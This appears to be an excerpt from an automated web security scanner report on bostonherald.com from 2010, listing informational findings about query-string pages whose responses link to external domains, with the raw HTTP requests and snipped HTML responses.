...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Farts_culture%2Fview.bg%3Farticleid%3D1294372&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.9. http://bostonherald.com/galleries/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/galleries/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/galleries/index.php?gallery_id=10

The response contains the following links to other domains:

http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234
http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://multimedia.heraldinteractive.com/images/galleries/backpdf_11072010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sport_10202010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09192010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09242010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09262010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09292010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09302010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10062010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10072010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10082010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10222010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10232010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10242010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10292010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_11052010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10022010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10052010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10162010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10172010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10302010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10312010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_11062010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_11072010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09142010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09202010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09282010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10042010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10112010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10122010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10192010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports091272010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports09152010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports10092010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports20100925.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09162010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09172010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09212010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09222010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09232010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10012010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10102010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10132010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10142010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10152010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10212010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10252010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10262010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10272010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10282010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11012010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11022010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11032010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11042010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportspdf_10032010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sportspdf_10182010.jpg

Request

GET /galleries/index.php?gallery_id=10 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:49:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Boston Herald Sports Cov
...[SNIP]...
<meta name="SUBSECTION" content="Multimedia Center" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234" media="all" />

<style type="text/css">
...[SNIP]...
<a id="galleryHeaderLink" href="#"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a href="?gallery_id=10&p=0" ><img class="galleryThumb galleryThumbSelected" src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_11072010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=1" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_11062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=2" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_11052010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=3" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11042010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=4" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11032010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=5" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11022010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=6" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_11012010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=7" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10312010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=8" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=9" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=10" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=11" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=12" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=13" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10252010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=14" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=15" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=16" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=17" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=18" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sport_10202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=19" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=20" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportspdf_10182010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=21" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=22" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=23" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10152010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=24" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10142010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=25" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10132010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=26" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10122010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=27" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10112010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=28" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10102010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=29" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports10092010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=30" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10082010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=31" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10072010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=32" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_10062010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=33" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10052010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=34" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_10042010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=35" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportspdf_10032010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=36" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/backpdf_10022010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=37" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_10012010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=38" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09302010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=39" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09292010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=40" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09282010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=41" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports091272010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=42" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09262010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=43" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports20100925.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=44" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09242010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=45" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09232010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=46" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09222010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=47" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09212010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=48" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09202010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=49" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_09192010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=50" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sportpdf_09142010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=51" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09172010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=52" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports_09162010.jpg" alt="Photo" /></a>
...[SNIP]...
<a href="?gallery_id=10&p=53" ><img class="galleryThumb " src="http://multimedia.heraldinteractive.com/images/galleries/stp/sports09152010.jpg" alt="Photo" /></a>
...[SNIP]...
<div id="galleryLeftPhotoLeft">
<img id="galleryImage" style="border:solid 1px #000" src="http://multimedia.heraldinteractive.com/images/galleries/backpdf_11072010.jpg">

<br />
...[SNIP]...

8.10. http://bostonherald.com/homepage.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/homepage.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/homepage.bg?showResults=1#results

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/blogs/lifestyle/behind_the_wheel/wp-content/uploads/2010/11/nashstreetrod.jpg
http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg
http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2010/11/neil-entwistle.JPG
http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2010/11/rondofeet.JPG
http://cache.heraldinteractive.com/blogs/sports/high_school/wp-content/uploads/2010/11/img_0192.JPG
http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2010/11/vince-wilfork.jpg
http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2010/11/theoheraldfile.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif
http://cache.heraldinteractive.com/images/siteImages/weather/03.gif
http://cache.heraldinteractive.com/images/siteImages/weather/04.gif
http://cache.heraldinteractive.com/images/siteImages/weather/18.gif
http://cache.heraldinteractive.com/images/siteImages/weather/19.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordan_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg
http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/b3cddd_dwoodhead11052010.jpg
http://multimedia.heraldinteractive.com/images/20101107/3ec29e_07tosc1.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/0b0f8e_stab_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/0b646b_killer_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/4348cc_bomb_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/8b11c8_ltpfranco20101107_edited-1.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/b6c328_sal_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/b9b0fc_sassy_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/c595ca_ltpconan20101108.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/2ab65a_clee11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/4e5b50_lil_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/590145_aaron_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/b2d2ab_vermonty11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/cb73f7_lisam11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg
http://multimedia.heraldinteractive.com/images/419a149cad_music07072009.jpg
http://multimedia.heraldinteractive.com/images/promo/20101107/369b895a4c_funetease_11082010.jpg
http://multimedia.heraldinteractive.com/images/promo/20101107/e5caeeddd1_OnTheT_210x45.jpg
http://multimedia.heraldinteractive.com/images/promo/20101108/913f79de63_bradytease_11082010.jpg
http://multimedia.heraldinteractive.com/images/promo/backpdf_11072010.jpg
http://multimedia.heraldinteractive.com/images/promo/frontpdf_11072010.jpg
http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/individual.aspx?team=028
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/schedule.aspx?team=092,season=
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nba/teams/092/tmstat.aspx?id=092
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/sched.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/teamstat.aspx?id=077
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/indstats.aspx?team=121
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/schedule.aspx?team=121,season=
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.carfind.com/?srvc=home&position=also
http://www.carfind.com/sellCar.bg
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.homefind.com/?listingid=HF5728980
http://www.homefind.com/?srvc=home&position=also
http://www.homefind.com/for-agents/
http://www.homefind.com/post-property/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.people2people.com/?connect=boshrld&page=login
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.shoplocal.com/bostonherald/
http://www.uclick.com/client/boh/sudoc/

Request

GET /homepage.bg?showResults=1#results HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:46:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 150596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
